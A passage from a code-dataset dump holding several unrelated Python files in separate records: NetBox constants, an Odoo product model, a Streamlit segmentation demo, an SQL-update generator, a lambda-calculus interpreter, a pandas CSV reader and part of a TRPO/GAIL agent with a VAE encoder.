600\nCUSTOMFIELD_TYPE_CHOICES = (\n (CF_TYPE_TEXT, 'Text'),\n (CF_TYPE_INTEGER, 'Integer'),\n (CF_TYPE_BOOLEAN, 'Boolean (true/false)'),\n (CF_TYPE_DATE, 'Date'),\n (CF_TYPE_URL, 'URL'),\n (CF_TYPE_SELECT, 'Selection'),\n)\n\n# Custom field filter logic choices\nCF_FILTER_DISABLED = 0\nCF_FILTER_LOOSE = 1\nCF_FILTER_EXACT = 2\nCF_FILTER_CHOICES = (\n (CF_FILTER_DISABLED, 'Disabled'),\n (CF_FILTER_LOOSE, 'Loose'),\n (CF_FILTER_EXACT, 'Exact'),\n)\n\n# Graph types\nGRAPH_TYPE_INTERFACE = 100\nGRAPH_TYPE_PROVIDER = 200\nGRAPH_TYPE_SITE = 300\nGRAPH_TYPE_CHOICES = (\n (GRAPH_TYPE_INTERFACE, 'Interface'),\n (GRAPH_TYPE_PROVIDER, 'Provider'),\n (GRAPH_TYPE_SITE, 'Site'),\n)\n\n# Models which support export templates\nEXPORTTEMPLATE_MODELS = [\n 'provider', 'circuit', # Circuits\n 'site', 'region', 'rack', 'rackgroup', 'manufacturer', 'devicetype', 'device', # DCIM\n 'consoleport', 'powerport', 'interfaceconnection', 'virtualchassis', # DCIM\n 'aggregate', 'prefix', 'ipaddress', 'vlan', 'vrf', 'service', # IPAM\n 'secret', # Secrets\n 'tenant', # Tenancy\n 'cluster', 'virtualmachine', # Virtualization\n]\n\n# Topology map types\nTOPOLOGYMAP_TYPE_NETWORK = 1\nTOPOLOGYMAP_TYPE_CONSOLE = 2\nTOPOLOGYMAP_TYPE_POWER = 3\nTOPOLOGYMAP_TYPE_CHOICES = (\n (TOPOLOGYMAP_TYPE_NETWORK, 'Network'),\n (TOPOLOGYMAP_TYPE_CONSOLE, 'Console'),\n (TOPOLOGYMAP_TYPE_POWER, 'Power'),\n)\n\n# Change log actions\nOBJECTCHANGE_ACTION_CREATE = 1\nOBJECTCHANGE_ACTION_UPDATE = 2\nOBJECTCHANGE_ACTION_DELETE = 3\nOBJECTCHANGE_ACTION_CHOICES = (\n (OBJECTCHANGE_ACTION_CREATE, 'Created'),\n (OBJECTCHANGE_ACTION_UPDATE, 'Updated'),\n (OBJECTCHANGE_ACTION_DELETE, 'Deleted'),\n)\n\n# User action types\nACTION_CREATE = 1\nACTION_IMPORT = 2\nACTION_EDIT = 3\nACTION_BULK_EDIT = 4\nACTION_DELETE = 5\nACTION_BULK_DELETE = 6\nACTION_BULK_CREATE = 7\nACTION_CHOICES = (\n (ACTION_CREATE, 'created'),\n (ACTION_BULK_CREATE, 'bulk created'),\n (ACTION_IMPORT, 'imported'),\n (ACTION_EDIT, 'modified'),\n (ACTION_BULK_EDIT, 'bulk edited'),\n (ACTION_DELETE, 'deleted'),\n (ACTION_BULK_DELETE, 'bulk deleted'),\n)\n\n# Report logging levels\nLOG_DEFAULT = 0\nLOG_SUCCESS = 10\nLOG_INFO = 20\nLOG_WARNING = 30\nLOG_FAILURE = 40\nLOG_LEVEL_CODES = {\n LOG_DEFAULT: 'default',\n LOG_SUCCESS: 'success',\n LOG_INFO: 'info',\n LOG_WARNING: 'warning',\n LOG_FAILURE: 'failure',\n}\n\n# webhook content types\nWEBHOOK_CT_JSON = 1\nWEBHOOK_CT_X_WWW_FORM_ENCODED = 2\nWEBHOOK_CT_CHOICES = (\n (WEBHOOK_CT_JSON, 'application/json'),\n (WEBHOOK_CT_X_WWW_FORM_ENCODED, 'application/x-www-form-urlencoded'),\n)\n\n# Models which support registered webhooks\nWEBHOOK_MODELS = (\n 'provider', 'circuit', # Circuits\n 'site', 'rack', 'devicetype', 'device', 'virtualchassis', # DCIM\n 'consoleport', 'consoleserverport', 'powerport', 'poweroutlet',\n 'interface', 'devicebay', 'inventoryitem',\n 'aggregate', 'prefix', 'ipaddress', 'vlan', 'vrf', 'service', # IPAM\n 'secret', # Secrets\n 'tenant', # Tenancy\n 'cluster', 'virtualmachine', # Virtualization\n)\n","sub_path":"netbox/extras/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":4234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"404472665","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing tailsde.\nfrom odoo import models, fields, api, exceptions\nimport datetime\nimport suds.client\nimport json\n\n\nclass ProductCategory(models.Model):\n _inherit = 'product.category'\n\n code = fields.Char('Code')\n\n @api.multi\n def name_get(self):\n return [(record.id, \"%s:%s\" % (record.code, record.name)) for record in self]\n\n\nclass Product(models.Model):\n _inherit = 'product.template'\n\n @api.model\n def create(self, vals):\n res = super(Product, self).create(vals)\n if res:\n if 'default_code' not in vals and not res.default_code:\n if res.categ_id:\n if res.categ_id.code:\n default_code = self.env['ir.sequence'].get_next_code_info_if_no_create('product', res.categ_id.code, '', 7)\n res.default_code = default_code\n else:\n raise exceptions.Warning('产品类别没有配置code,请配置后重试!')\n elif 'default_code' in vals:\n res.default_code = vals['default_code']\n return res\n","sub_path":"e2yun_addons/odoo12/e2yun_getech_sale_order_extends/models/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"406771799","text":"import streamlit as st\nfrom PIL import Image\nimport numpy as np\nimport pandas as pd\nfrom patch_inference import get_prediction, get_model\nimport time\n# Call get_model in a cached manner before proceeding to the prediction\n\n# get_model()\nst.title('Image Segmentation App')\n\n\n\"## Upload a Satellite Image\"\nuploaded_file = st.file_uploader(\"Choose an image..\", \n type = [\"jpg\", \"jpeg\", \"png\"])\n\n# Pass the path / virtual path of the image here\n\n\n# mask, damage = get_prediction(uploaded_file)\n# if mask and damage:\n# st.image([mask, damage], \n# caption = [\"Building Mask Prediction\", \"Flood Damage Mask Prediction\"])\n\n############# Testing code ################### \nif uploaded_file:\n with st.spinner(\"Prediction in progress...\"):\n # Change this spinner to run until prediction task is completed\n time.sleep(5)\n st.balloons()\n st.success(\"Prediction Completed\")\n \n \n \"# Given Satellite Image: \"\n st.image(uploaded_file, width = 600)\n \"# Output:\"\n st.image([\"image1.jpeg\", \"image2.jpg\"],\n caption = [\"Building Mask Prediction\", \"Flood Damage Mask Prediction\"])","sub_path":"streamlit-app/first_app.py","file_name":"first_app.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"138057980","text":"#!/usr/bin/env python\n\n# Author: Venkata chandrasekhar Nainala \n# Version: 0.1.0\n# Email: mailcs76@gmail.com / venkata@ebi.ac.uk\n# Date: 19 May 2016\n\n\"\"\" \n Dependencies:\n Python 2.7\n\"\"\"\nimport sys\nimport argparse\nimport utils\nimport logging\nimport os\nimport time\nimport json\nimport subprocess\nfrom random import randint\n\ndestinationDirectory = \"\"\nworkingDirectory = \"\"\nftp = \"\"\n\nglobalReport = {}\n\nclass readable_dir(argparse.Action):\n def __call__(self,parser, namespace, values, option_string=None):\n prospective_dir=values\n if not os.path.isdir(prospective_dir):\n raise argparse.ArgumentTypeError(\"readable_dir:{0} is not a valid path\".format(prospective_dir))\n if os.access(prospective_dir, os.R_OK):\n setattr(namespace,self.dest,prospective_dir)\n else:\n raise argparse.ArgumentTypeError(\"readable_dir:{0} is not a readable dir\".format(prospective_dir))\n\ndef main(arguments):\n parser = argparse.ArgumentParser(description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument('-l', '--launch_directory', action=readable_dir, default = \"\" )\n parser.add_argument('-f', '--ftp', action=readable_dir, default=\"/ebi/ftp/pub/databases/metabolights/compounds/\", help=\"FTP directory\")\n args = parser.parse_args(arguments)\n global destinationDirectory\n global ftp\n\n workingDirectory = args.launch_directory\n ftp = args.ftp\n\n if(workingDirectory == \"\"):\n workingDirectory = os.getcwd();\n\n # log file configuration\n st = utils.getDateAndTime();\n randomInt = str(randint(1, 1000))\n logDirectory = workingDirectory + \"/logs/exporter_\" + st \n if not os.path.exists(logDirectory):\n os.makedirs(logDirectory)\n logging.basicConfig(filename= logDirectory + \"/log_\" +randomInt +\".log\",level=logging.DEBUG)\n utils.init(logging)\n logging.info(\"-----------------------------------------------\")\n logging.info('# Run started -' + utils.getDateAndTime())\n\n metabolightsFlagsJSONFile = ftp + \"ml_flags.json\"\n with open(metabolightsFlagsJSONFile) as flags_file:\n metabolightsFlagsData = json.load(flags_file)\n\n query = \"\";\n for metabolite in metabolightsFlagsData:\n has_species = int (str(metabolightsFlagsData[metabolite][\"flags\"][\"hasSpecies\"]).lower() == \"true\" )\n has_pathways = int (str(metabolightsFlagsData[metabolite][\"flags\"][\"hasPathways\"]).lower() == \"true\" )\n has_reactions = int (str(metabolightsFlagsData[metabolite][\"flags\"][\"hasReactions\"]).lower() == \"true\" )\n has_nmr = int (str(metabolightsFlagsData[metabolite][\"flags\"][\"hasNMR\"]).lower() == \"true\" )\n has_ms = int (str(metabolightsFlagsData[metabolite][\"flags\"][\"hasMS\"]).lower() == \"true\" )\n has_literature = int (str(metabolightsFlagsData[metabolite][\"flags\"][\"hasLiterature\"]).lower() == \"true\" )\n query += \"update mmimtbldev.isatab.ref_metabolite set has_species = \"+str(has_species)+\", has_pathways = \"+str(has_pathways)+\", has_reactions = \"+str(has_reactions)+\", has_nmr= \"+str(has_nmr)+\", has_ms= \"+str(has_ms)+\", has_literature= \"+str(has_literature)+\" where acc = '\" + metabolite.strip() + \"';\" + \"\\n\"\n\n file = open(workingDirectory + \"/query.txt\",\"w\") \n file.write(query) \n\nif __name__ == \"__main__\":\n sys.exit(main(sys.argv[1:]))","sub_path":"MetCompoundBot/GenerateSQLUpdate.py","file_name":"GenerateSQLUpdate.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"236523717","text":"class Variable:\n\n def __init__(self, name):\n self.name = name\n self.type = 'var'\n\n def __str__(self):\n return str(self.name)\n\n def __repr__(self):\n return str(self)\n\n\nclass Abstraction:\n\n def __init__(self, variables, body):\n self.variables = variables\n self.body = body\n self.type = 'lambda'\n\n def __str__(self):\n string = '(λ'\n for var in self.variables:\n string += str(var)\n string += '.' + str(self.body) + ')'\n return string\n\n def __repr__(self):\n return str(self)\n\n def __call__(self, other):\n var = self.variables[0]\n body = self.body.replace(var, str(other))\n if len(self.variables) == 1:\n return choice(body)\n else:\n return Abstraction(self.variables[1:], body)\n\n\nclass Expression:\n\n def __init__(self, expression):\n self.expression = expression\n self.reduced = False\n self.type = 'expression'\n\n def __str__(self):\n string = ''\n for item in self.expression:\n string += str(item)\n return string\n\n def __repr__(self):\n return str(self)\n\n def reduce(self):\n result = Expression(reduce(self.expression))\n return expression(str(result))\n\n\ndef variable(string):\n string = remove_outer_brackets(string).replace('\\\\', 'λ')\n\n # Variables can only be 1 character\n assert len(string) == 1\n\n # Variables cannot contain keysymbols\n assert string not in 'λ.()'\n\n return Variable(string)\n\n\ndef abstraction(string):\n string = remove_outer_brackets(string).replace('\\\\', 'λ')\n\n # Abstraction must start with λ\n assert string[0] == 'λ'\n\n # Variables before dot, body after dot\n dot_index = string.index('.')\n variables = string[1:dot_index]\n body = string[dot_index+1:]\n\n # Must be >= 1 variables\n assert len(variables) >= 1\n\n # Variables must be legal\n for var in variables:\n assert valid_variable(var)\n\n # Body must be legal expression\n assert valid_expression(body)\n\n return Abstraction(variables, body)\n\n\ndef expression(string):\n string = remove_outer_brackets(string).replace('\\\\', 'λ')\n sequence = []\n i = 0\n\n while i < len(string):\n char = string[i]\n\n # Abstraction\n if char == 'λ':\n sequence.append(abstraction(string[i:]))\n i = len(string)\n\n # Variable\n elif valid_variable(char):\n sequence.append(variable(char))\n i += 1\n\n # Subexpression\n elif char == '(':\n j = partner_bracket(i, string)\n sequence.append(choice(string[i+1:j]))\n i = j + 1\n\n return Expression(sequence)\n\n\ndef choice(string):\n if valid_variable(string):\n return variable(string)\n elif valid_abstraction(string):\n return abstraction(string)\n else:\n return expression(string)\n\n\ndef reduce(expression):\n reduced = []\n applied = False\n i = 0\n\n while i < len(expression) and not applied:\n term = expression[i]\n\n # Sub Expression\n if term.type == 'expression':\n reduced.append(term.reduce())\n applied = True\n i += 1\n\n # Abstraction\n elif term.type == 'lambda' and (i+1) < len(expression):\n data = expression[i+1]\n reduced.append(term(data))\n applied = True\n i += 2\n\n else:\n reduced.append(term)\n i += 1\n\n reduced += expression[i:]\n return reduced\n\n\ndef normalise(string):\n reductions = []\n normalised = False\n pre = expression(string)\n post = pre\n reductions.append(str(pre))\n\n while not normalised:\n post = pre.reduce()\n reductions.append(str(post))\n\n # Have we normalised the expression?\n if str(post) == str(pre):\n normalised = True\n\n pre = post\n\n return reductions\n\n\ndef valid(func, string):\n try:\n func(string)\n return True\n except:\n return False\n\n\ndef valid_variable(string):\n return valid(variable, string)\n\n\ndef valid_abstraction(string):\n return valid(abstraction, string)\n\n\ndef valid_expression(string):\n return valid(expression, string)\n\n\ndef remove_outer_brackets(string):\n start = 0\n end = len(string) - 1\n if string[start] == '(' and string[-1] == ')':\n partner = partner_bracket(0, string)\n if partner == end:\n return string[1:-1]\n else:\n return string\n else:\n return string\n\n\ndef partner_bracket(i, string):\n count = 1\n j = i\n\n while count > 0:\n j += 1\n if string[j] == '(':\n count += 1\n elif string[j] == ')':\n count -= 1\n\n return j\n","sub_path":"backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":4789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"31218244","text":"from pandas import Series, DataFrame\r\nf = open(\"TrafficAccident.csv\",\"r\")\r\ndm = f.readline().strip().split(',')[1:]\r\n\r\nframe = DataFrame()\r\nfor line in f:\r\n \r\n x = line.strip().split(',')\r\n s = Series(x[1:], index = dm)\r\n frame[x[0]] = s\r\n \r\n\r\nprint (frame)\r\n\r\nf.close()\r\n","sub_path":"P1.py","file_name":"P1.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"262779235","text":"# from myconfig import myconfig\nfrom myconfig import myconfig\nimport tensorflow as tf\nimport copy\nfrom tensorflow.python.keras.layers import Input, Dense, concatenate, LeakyReLU\nfrom tensorflow.python.keras.models import Model\nfrom tensorflow.python.keras.losses import mean_squared_error\nfrom matplotlib import pyplot as plt\nimport os\nimport numpy as np\nimport pandas as pd\nfrom scipy.ndimage.interpolation import shift\nfrom tensorflow.keras.utils import to_categorical\nfrom collections import deque\n# import warnings\nfrom critic import Critic\nfrom utils import conjugate_gradient, set_from_flat, kl, self_kl, \\\n flat_gradient, get_flat, discount, line_search, gauss_log_prob, visualize, gradient_summary, \\\n unnormalize_action, unnormalize_observation, unnormalize_observation_metar, unnormalize_observation2\nimport random\n\n\n# from cartpole.critic.critic import Critic\n# from cartpole.trpo.utils import conjugate_gradient, set_from_flat, kl, self_kl,\\\n# flat_gradient, get_flat, discount, line_search\n# np.seterr(all='warn')\n# warnings.filterwarnings('error')\n\n# http://rail.eecs.berkeley.edu/deeprlcoursesp17/docs/lec5.pdf\n\n# TensorFlow wizardry\nconfig = tf.ConfigProto()\n\n# Don't pre-allocate memory; allocate as-needed\nconfig.gpu_options.allow_growth = True\n\n# Only allow a total of half the GPU memory to be allocated\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.6\n\n\nclass ClonosEncoder(object):\n\n @staticmethod\n def create_encoder(observation_dimensions, latent_dimensions):\n with tf.name_scope('Encoder'):\n encoder_x = Input(shape=(observation_dimensions+latent_dimensions,), dtype=tf.float64)\n\n l1 = Dense(100, activation='tanh')(encoder_x) #name='dense_6'), activation=tf.keras.layers.LeakyReLU(alpha=0.01)\n l2 = Dense(100, activation='tanh')(l1) #name='dense_7')\n\n out = Dense(latent_dimensions, activation='softmax')(l2) #name='dense_8')\n\n model = Model(inputs=encoder_x, outputs=out)\n\n return model, encoder_x, l1, l2\n\n\nclass Policy(object):\n\n @staticmethod\n def create_policy(observation_dimensions, latent_dimensions, action_dimensions):\n \"\"\"\n Creates the model of the policy.\n :param observation_dimensions: Observations' dimensions.\n :param action_dimensions: Actions' dimensions.\n :return: Model and the Input layer.\n \"\"\"\n with tf.name_scope('Policy'):\n x = Input(shape=(observation_dimensions+latent_dimensions,), dtype=tf.float64)\n\n h = Dense(100, activation='tanh')(x)#, name='Policy/dense_9')(x)\n h1 = Dense(100, activation='tanh')(h)#, name='Policy/dense_10')(h)\n\n out = Dense(action_dimensions)(h1)#, name='Policy/dense_11')(h1)\n\n model = Model(inputs=x, outputs=out)\n\n return model, x, h, h1\n\n\nclass Discriminator(object):\n\n def __init__(self, observation_dimensions=4, action_dimensions=2):\n self.alpha = myconfig['discriminator_alpha']\n self.epochs = myconfig['discriminator_epochs']\n self.sess = tf.Session(config=config)\n\n self.observations_input = Input(shape=(observation_dimensions,), dtype=tf.float64)\n self.actions_input = Input(shape=(action_dimensions,), dtype=tf.float64)\n self.input = concatenate([self.observations_input, self.actions_input])\n\n h1 = Dense(100, activation='tanh')(self.input)\n h2 = Dense(100, activation='tanh')(h1)\n\n self.out = Dense(1)(h2)\n\n self.discriminate = Model(inputs=[self.observations_input, self.actions_input],\n outputs=self.out)\n\n self.log_D = tf.log(tf.nn.sigmoid(self.out))\n\n self.expert_samples_observations = Input(shape=(observation_dimensions,),\n dtype=tf.float64)\n self.expert_samples_actions = Input(shape=(action_dimensions,), dtype=tf.float64)\n self.policy_samples_observations = Input(shape=(observation_dimensions,), dtype=tf.float64)\n self.policy_samples_actions = Input(shape=(action_dimensions,), dtype=tf.float64)\n self.expert_samples_out = self.discriminate([self.expert_samples_observations,\n self.expert_samples_actions])\n self.policy_samples_out = self.discriminate([self.policy_samples_observations,\n self.policy_samples_actions])\n\n self.discriminator = Model(inputs=[self.expert_samples_observations,\n self.expert_samples_actions,\n self.policy_samples_observations,\n self.policy_samples_actions\n ],\n outputs=[self.expert_samples_out,\n self.policy_samples_out])\n\n # self.expert_loss = tf.reduce_mean(tf.logs(tf.ones_like(self.expert_samples_out)-tf.nn.sigmoid(self.expert_samples_out)))\n # self.policy_loss = tf.reduce_mean(tf.logs(tf.nn.sigmoid(self.expert_samples_out)))\n # self.loss = -(self.expert_loss + self.policy_loss)\n self.expert_loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=self.expert_samples_out,\n labels=tf.zeros_like(\n self.expert_samples_out))\n self.policy_loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=self.policy_samples_out,\n labels=tf.ones_like(\n self.policy_samples_out))\n self.expert_loss_avg = tf.reduce_mean(self.expert_loss)\n self.policy_loss_avg = tf.reduce_mean(self.policy_loss)\n self.loss = tf.reduce_mean(self.expert_loss) + tf.reduce_mean(self.policy_loss)\n\n # self.predictions = self.discriminate.outputs[0]\n # self.labels = tf.placeholder(tf.float32, shape=(None), name='y')\n # self.loss = tf.nn.sigmoid.cross_entropy_with_logits(self.out,self.labels)\n self.opt = tf.train.AdamOptimizer(self.alpha).minimize(self.loss)\n # self.opt = tf.train.RMSPropOptimizer(self.alpha, decay=0.9).minimize(self.loss)\n self.sess.run(tf.global_variables_initializer())\n with open(myconfig['output_dir']+'/disc_train_loss_log.csv', 'w') as disc_train_log:\n disc_train_log.write(\"epoch,total_loss,expert_loss,policy_loss\"+\"\\n\")\n\n\n def get_trainable_weights(self):\n return self.sess.run(\n [self.discriminate.trainable_weights], feed_dict={})[0]\n\n def train(self, expert_samples_observations, expert_samples_actions,\n policy_samples_observations, policy_samples_actions):\n with open(myconfig['output_dir']+'/disc_train_loss_log.csv', 'a') as disc_train_log:\n loss_run = 0\n loss_before_train = 0\n for i in range(self.epochs):\n _, loss_run, expert_loss_run, policy_loss_run = self.sess.run([self.opt, self.loss, self.expert_loss_avg,self.policy_loss_avg],\n feed_dict={\n self.expert_samples_observations:\n expert_samples_observations,\n self.expert_samples_actions:\n expert_samples_actions,\n self.policy_samples_observations:\n policy_samples_observations,\n self.policy_samples_actions:\n policy_samples_actions\n })\n if i == 0:\n loss_before_train = loss_run\n\n disc_train_log.write(str(i) + \",\" + str(loss_run)+\",\" + str(expert_loss_run) + \",\" + str(policy_loss_run)+\"\\n\")\n # print('Discriminator loss:', loss_run)\n # if i % 100 == 0: print(i, \"loss:\", loss_run)\n return loss_before_train, loss_run\n\n def predict(self, samples_observations, samples_actions):\n return self.sess.run(self.log_D,\n feed_dict={self.observations_input: samples_observations,\n self.actions_input: samples_actions})\n\n\n\n\nclass TRPOAgent(object):\n\n def __init__(self, env, observation_dimensions=10, latent_dimensions=3, action_dimensions=3):\n \"\"\"\n Initializes the agent's parameters and constructs the flowgraph.\n :param env: Environment\n :param observation_dimensions: Observations' dimensions.\n :param action_dimensions: Actions' dimensions.\n \"\"\"\n self.latent_list = []\n self.latent_sequence1 = []\n self.latent_sequence_prob = []\n self.encoder_rew = []\n self.encoder_rew_reset = []\n self.counter = 0\n self.counter2 = 0\n self.init = True\n\n self.env = env\n self.observation_dimensions = observation_dimensions\n self.action_dimensions = action_dimensions\n self.latent_dimensions = latent_dimensions\n self.path_size = myconfig['path_size']\n self.mini_batch_size = myconfig['mini_batch_size']\n self.mini_batches = myconfig['mini_batches']\n self.gamma = myconfig['gamma']\n self.lamda = myconfig['lamda']\n self.max_kl = myconfig['max_kl']\n self.total_episodes = 0\n self.logstd = np.float64(myconfig['logstd'])\n self.critic = Critic(observation_dimensions=self.observation_dimensions)\n self.discriminator = Discriminator(observation_dimensions=self.observation_dimensions, action_dimensions=self.action_dimensions)\n # self.replay_buffer = ReplayBuffer()\n self.sess = tf.Session(config=config)\n self.model2, self.encoder_x, self.l1, self.l2 = ClonosEncoder.create_encoder(self.observation_dimensions, self.latent_dimensions)\n self.model, self.x, self.h, self.h1 = Policy.create_policy(self.observation_dimensions, self.latent_dimensions, self.action_dimensions)\n\n visualize(self.model.trainable_weights)\n\n self.episode_history = deque(maxlen=100)\n\n self.advantages_ph = tf.placeholder(tf.float64, shape=None)\n self.actions_ph = tf.placeholder(tf.float64, shape=(None, action_dimensions),)\n self.old_log_prob_ph = tf.placeholder(tf.float64, shape=None)\n self.theta_ph = tf.placeholder(tf.float64, shape=None)\n self.tangent_ph = tf.placeholder(tf.float64, shape=None)\n self.mu_old_ph = tf.placeholder(tf.float64, shape=(None, action_dimensions))\n\n self.encoder_logits = self.model2.outputs[0]\n self.logits = self.model.outputs[0]\n\n #EDW\n self.q = self.encoder_logits\n self.argmax_q = tf.argmax(self.q, axis=1)\n # self.log_q = tf.log(self.argmax_q)\n\n var_list = self.model.trainable_weights\n self.flat_vars = get_flat(var_list)\n self.sff = set_from_flat(self.theta_ph, var_list)\n\n self.step_direction = tf.placeholder(tf.float64, shape=None)\n self.g_sum = gradient_summary(self.step_direction, var_list)\n\n # Compute surrogate.\n self.log_prob = gauss_log_prob(self.logits, self.logstd, self.actions_ph)\n neg_lh_divided = tf.exp(self.log_prob - self.old_log_prob_ph)\n w_neg_lh = neg_lh_divided * self.advantages_ph\n self.surrogate = tf.reduce_mean(w_neg_lh)\n\n kl_op = kl(self.logits, self.logstd, self.mu_old_ph, self.logstd)\n self.losses = [self.surrogate, kl_op]\n\n self.flat_grad = flat_gradient(self.surrogate, var_list)\n # Compute fisher vector product\n self_kl_op = self_kl(self.logits, self.logstd)\n self_kl_flat_grad = flat_gradient(self_kl_op, var_list)\n g_vector_dotproduct = tf.reduce_sum(self_kl_flat_grad * self.tangent_ph)\n # self.self_kl_grad = tf.gradients(self_kl_op, var_list)\n # start = 0\n # tangents = []\n # for var in var_list:\n # end = start+np.prod(var.shape)\n # tangents.append(tf.reshape(tangent_ph[start:end],var.shape))\n # start = end\n # g_vector_product = [tf.reduce_sum(g * t) for (g, t) in zip(\n # self_kl_grad, tangents)]\n self.fvp = flat_gradient(g_vector_dotproduct, var_list)\n self.merged = tf.summary.merge_all()\n self.train_writer = tf.summary.FileWriter(myconfig['log_dir'], self.sess.graph)\n self.sess.run(tf.global_variables_initializer())\n\n def predict(self, samples_observations):\n q_sess, q_arg = self.sess.run([self.q, self.argmax_q], feed_dict={self.encoder_x: samples_observations})\n #print('q: \\n', q_sess)\n #print('q_argmax:\\n', q_arg)\n #print('len_q:', len(q_sess), 'len_q_arg2:', len(q_arg))\n\n return q_sess, q_arg\n\n def __fisher_vector_product(self, g, feed):\n \"\"\"\n Computes fisher vector product H*g using the direct method.\n :param p: Gradient of surrogate g.\n :param feed: Dictionary, feed_dict for tf.placeholders.\n :return: Fisher vector product H*g.\n \"\"\"\n damping = myconfig['fvp_damping']\n feed[self.tangent_ph] = g\n fvp_run = self.sess.run(self.fvp, feed)\n assert fvp_run.shape == g.shape, \"Different shapes. fvp vs g\"\n return fvp_run + g * damping\n\n def get_vars(self):\n model2_weights = self.model2.weights\n model_weights = self.model.weights\n return model2_weights, model_weights\n\n def encoder_rewards(self, prob_latents):\n winner = np.argmax(prob_latents)\n encoder_reward = np.log(prob_latents[winner])\n #print('r:',encoder_reward)\n self.encoder_rew.append([encoder_reward])\n #array = np.asarray(self.encoder_rew[:])\n\n def one_hot_encoding(self, x):\n # print('OneHotEncoding...')\n argmax = np.argmax(x)\n encoded = to_categorical(argmax, num_classes=5)\n # print('enc:', encoded)\n return encoded.tolist(), argmax\n\n def test_one_hot_encoding(self, x):\n # print('OneHotEncoding...')\n argmax = np.argmax(x)\n self.plot_test_latent_var.append(argmax)\n encoded = to_categorical(argmax, num_classes=5)\n # print('enc:', encoded)\n return encoded.tolist(), argmax\n\n def act(self, observation, latent_seq): # , latent):\n global global_concat\n global obs_matrix\n\n #print('self.counter = ', self.counter)\n decoder_input = np.concatenate((np.asarray(observation), latent_seq[self.counter]))\n obs_matrix = decoder_input\n mu = self.sess.run(self.logits, feed_dict={self.x: [decoder_input]})[0]\n\n act = mu + self.logstd * np.random.randn(self.action_dimensions)\n self.counter += 1\n\n return act, mu # , log_q #m2\n\n def init_encoder(self, observation):\n #init_latent = [1., 0., 0.]\n init_latent = [1., 0., 0., 0., 0.]\n init_latent = np.asarray(init_latent)\n enc_input = np.concatenate((np.asarray(observation), init_latent))\n # print('obs_l:', enc_input)\n mu2 = self.sess.run(self.encoder_logits, feed_dict={self.encoder_x: [enc_input]})[0]\n latent_prob = np.asarray(mu2)\n latent, arg = self.test_one_hot_encoding(latent_prob)\n\n decoder_input = np.concatenate((np.asarray(observation), latent))\n return decoder_input, latent, arg\n\n def new_encoder(self, observation, latent_new):\n global global_concat_test\n\n if self.init == True:\n enc_input_n = np.concatenate((np.asarray(observation), latent_new))\n # print('obs_l:',enc_input_n)\n else:\n enc_input_n = np.concatenate((np.asarray(observation), global_concat_test))\n # print('obs_l:', enc_input_n)\n mu2 = self.sess.run(self.encoder_logits, feed_dict={self.encoder_x: [enc_input_n]})[0]\n\n latent_prob = np.asarray(mu2)\n latent_new, arg = self.test_one_hot_encoding(latent_prob)\n\n # array, shape = self.latent_sequence(mu2)\n\n # one_hot_enc = self.keras_oneHotEncoder(array, shape)\n\n global_concat_test = latent_new\n decoder_input = np.concatenate((np.asarray(observation), latent_new))\n return decoder_input, latent_new, arg\n\n def act_test(self, decoder_input):#, latent):\n mu = self.sess.run(self.logits, feed_dict={self.x: [decoder_input]})[0]\n act = mu\n return act\n\n def plot_vae_test(self, ploti, latent_var, e, savepath):\n ploti = np.asarray(ploti)\n latent_var = np.asarray(latent_var)\n ploti_size = ploti.size\n latent_var_size = latent_var.size\n e = np.asarray(e)\n\n ploti = ploti[:ploti_size].copy()\n save_path = os.getcwd() + savepath.format(e)#'/VAE/results_gumbel_softmax/plot/aviation/epoch{}_aviation_latents.png'\n pred_context = latent_var[:ploti_size].copy()\n fig = plt.figure(figsize=(8, 8))\n ax = fig.add_subplot(1, 1, 1)\n # ax.scatter(ploti, pred_context, c='r', marker='X')\n ax.plot(ploti, pred_context)\n plt.xlabel(\"TimeSteps\")\n # plt.xticks([0, 1000 ,3000, 5000, 7000, 9000, 9500, 10000])\n # naming the y axis\n plt.ylabel(\"Latent Vars\")\n # giving a title to my graph\n plt.title(\"Aviation Enriched - Barcelona to Madrid\")\n plt.savefig(save_path, bbox_inches='tight')\n plt.show()\n\n def run(self, episode_num, vae=False, bcloning=False, fname='0%_validate'):\n if bcloning:\n out_file = myconfig['output_dir']+'/exp'+str(myconfig['exp'])+'_'+fname+'_bcloning_results.csv'\n action_out_file = myconfig['output_dir']+'/exp'+str(myconfig['exp'])+'_'+fname+'_actions_bcloning_results.csv'\n elif vae:\n out_file = '../../../VAE/results_gumbel_softmax/checkpoint/run8-enriched_Metar(5modes)/trpo_plugins/0_VAE_results-Metar(3modes).csv'\n action_out_file = '../../../VAE/results_gumbel_softmax/checkpoint/run8-enriched_Metar(5modes)/trpo_plugins/0_actions_VAE_results-Metar(3modes).csv'\n\n enc_saver = tf.train.Saver(self.model2.weights)\n enc_saver.restore(self.sess,\"VAE/results_gumbel_softmax/checkpoint/run8-enriched_Metar(5modes)/trpo_plugins/encoder/encoder_model_e2000.ckpt\") # run2(batch-32-modes3)\n saver = tf.train.Saver(self.model.weights)\n saver.restore(self.sess,\"VAE/results_gumbel_softmax/checkpoint/run8-enriched_Metar(5modes)/trpo_plugins/decoder/decoder_model_e2000.ckpt\") # run2(batch-32-modes3)\n\n with open(out_file, 'w') as results, open(action_out_file, 'w') as action_results:\n results.write(\"episode,longitude,latitude,altitude,timestamp,Pressure_surface,\"\n \"Relative_humidity_isobaric,Temperature_isobaric,Wind_speed_gust_surface,\"\n 